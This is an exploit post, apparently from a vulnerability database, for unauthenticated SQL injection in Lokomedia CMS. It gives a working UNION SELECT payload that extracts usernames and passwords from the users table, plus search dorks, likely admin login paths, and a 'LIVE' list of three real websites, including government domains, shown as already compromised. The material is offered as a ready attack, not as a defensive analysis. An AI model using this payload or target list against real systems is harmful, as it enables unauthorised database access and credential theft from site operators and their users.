Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

2016.08.31

K33P-S1L3NT (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

###########################
# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
###########################
=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack
[+] Contact :- aurorakoizora@gmail.com
=========================================================
[+] Severity Level :- Medium
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id,
statis-1-profil.html (string )
statis-3-strukturorganisasi.html (string )
statis-1-visimisi.html (string)
statis-1-tujuan.html (string)
[+] Dork : -
statis-1-profil.html (work100% )
statis-3-strukturorganisasi.html (work100% )
statis-1-visimisi.html (work100%)
statis-1-tujuan.html (work100%)
[+] Local Admin
/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File :- /home/user/public_html/XXX.php
[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
- http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
- http://127.0.0.1/statis-1( exploit-code )visimisi.html
- http://127.0.0.1/statis-1( exploit-code )tujuan.html
########################################################
[+] Exploit
/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
##########################################################
[+] Testing
http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html
[+] NOTE
username & password open on title-bar or CTRL+U for view username & password this website exploit
###########################################################
[+] LIVE
http://portal.ukit.ac.id ( Title-bar http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )

References:

https://www.facebook.com/loading.gov/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.